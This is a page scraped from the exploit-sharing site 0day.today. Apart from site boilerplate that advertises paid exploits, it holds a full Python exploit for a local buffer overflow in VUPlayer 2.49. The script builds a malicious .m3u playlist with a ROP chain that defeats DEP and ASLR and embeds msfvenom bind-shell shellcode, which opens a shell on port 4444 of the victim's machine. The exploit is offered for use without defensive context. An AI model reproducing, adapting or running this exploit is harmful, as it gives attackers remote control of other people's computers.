0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP,ASLR) Exploit
# Exploit title: VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP,ASLR) # Exploit Author: Gobinathan L # Vendor Homepage: http://www.vuplayer.com/ # Version: v2.49 # Tested on: Windows 7 Professional with ALSR and Full DEP Turned ON. # Usage : $ python <exploit>.py #===================================[ VUPlayer 2.49 Exploit Generator ]======================================# import struct # msfvenom -p windows/shell_bind_tcp exitfunc=thread -b "\x00\x0a\x0d\x1a" -f c shell = ("\xd9\xc9\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x53\xbd\xa9\xc1\xbf" "\xb1\x83\xc2\x04\x31\x6a\x13\x03\xc3\xd2\x5d\x44\xef\x3d\x23" "\xa7\x0f\xbe\x44\x21\xea\x8f\x44\x55\x7f\xbf\x74\x1d\x2d\x4c" "\xfe\x73\xc5\xc7\x72\x5c\xea\x60\x38\xba\xc5\x71\x11\xfe\x44" "\xf2\x68\xd3\xa6\xcb\xa2\x26\xa7\x0c\xde\xcb\xf5\xc5\x94\x7e" "\xe9\x62\xe0\x42\x82\x39\xe4\xc2\x77\x89\x07\xe2\x26\x81\x51" "\x24\xc9\x46\xea\x6d\xd1\x8b\xd7\x24\x6a\x7f\xa3\xb6\xba\xb1" "\x4c\x14\x83\x7d\xbf\x64\xc4\xba\x20\x13\x3c\xb9\xdd\x24\xfb" "\xc3\x39\xa0\x1f\x63\xc9\x12\xfb\x95\x1e\xc4\x88\x9a\xeb\x82" "\xd6\xbe\xea\x47\x6d\xba\x67\x66\xa1\x4a\x33\x4d\x65\x16\xe7" "\xec\x3c\xf2\x46\x10\x5e\x5d\x36\xb4\x15\x70\x23\xc5\x74\x1d" "\x80\xe4\x86\xdd\x8e\x7f\xf5\xef\x11\xd4\x91\x43\xd9\xf2\x66" "\xa3\xf0\x43\xf8\x5a\xfb\xb3\xd1\x98\xaf\xe3\x49\x08\xd0\x6f" "\x89\xb5\x05\x05\x81\x10\xf6\x38\x6c\xe2\xa6\xfc\xde\x8b\xac" "\xf2\x01\xab\xce\xd8\x2a\x44\x33\xe3\x45\xc9\xba\x05\x0f\xe1" "\xea\x9e\xa7\xc3\xc8\x16\x50\x3b\x3b\x0f\xf6\x74\x2d\x88\xf9" "\x84\x7b\xbe\x6d\x0f\x68\x7a\x8c\x10\xa5\x2a\xd9\x87\x33\xbb" "\xa8\x36\x43\x96\x5a\xda\xd6\x7d\x9a\x95\xca\x29\xcd\xf2\x3d" "\x20\x9b\xee\x64\x9a\xb9\xf2\xf1\xe5\x79\x29\xc2\xe8\x80\xbc" "\x7e\xcf\x92\x78\x7e\x4b\xc6\xd4\x29\x05\xb0\x92\x83\xe7\x6a" "\x4d\x7f\xae\xfa\x08\xb3\x71\x7c\x15\x9e\x07\x60\xa4\x77\x5e" "\x9f\x09\x10\x56\xd8\x77\x80\x99\x33\x3c\xa0\x7b\x91\x49\x49" "\x22\x70\xf0\x14\xd5\xaf\x37\x21\x56\x45\xc8\xd6\x46\x2c\xcd" "\x93\xc0\xdd\xbf\x8c\xa4\xe1\x6c\xac\xec") ret = struct.pack("<I", 0x10010158) def create_rop_chain(): rop_gadgets = [ 0x100106e1, #POP EBP RET 0x100106e1, #Ptr to POP EBP RET popped into EBP 0x10015f82, #POP EAX RET 0xfffffdff, #Value to Negate.. result in 0x201 0x10014db4, #NEG EAX RET 0x10032f72, #XCHG EAX, EBX RET 0x10015f82, #POP EAX RET 0xffffffc0, #Value to negate ..result in 0x40 0x10014db4, #NEG EAX RET 0x10038a6d, #XCHG EAX, EDX RET 0x106053e5, #POP ECX RET 0x101082cc, #Random Location with Write Access 0x1001621c, #POP EDI RET 0x10010158, #RET will be stored in EDI 0x10604154, #POP ESI RET 0x10101c02, #JMP [EAX] 0x10015f77, # POP EAX # RETN [BASS.dll] 0x10109270, # ptr to &VirtualProtect() [IAT BASSWMA.dll] 0x1001d7a5, # PUSHAD # RETN 0x10022aa7, # JMP ESP ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() shellcode = "\x90"*32 + shell buffer = "A"*1012 buffer+= ret buffer+= rop_chain buffer+= shellcode buffer+= "\x90"*(2500 - len(buffer)) try: f = open("exploit.m3u", "w") f.write(buffer) print("[+] Payload Generated Successfully.") print("[+] Check for Open Port [4444] on Target Machine. A Bind shell is waiting for you..") f.close() except: print("[-] Couldn't Generate Payload.") # 0day.today [2024-12-24] #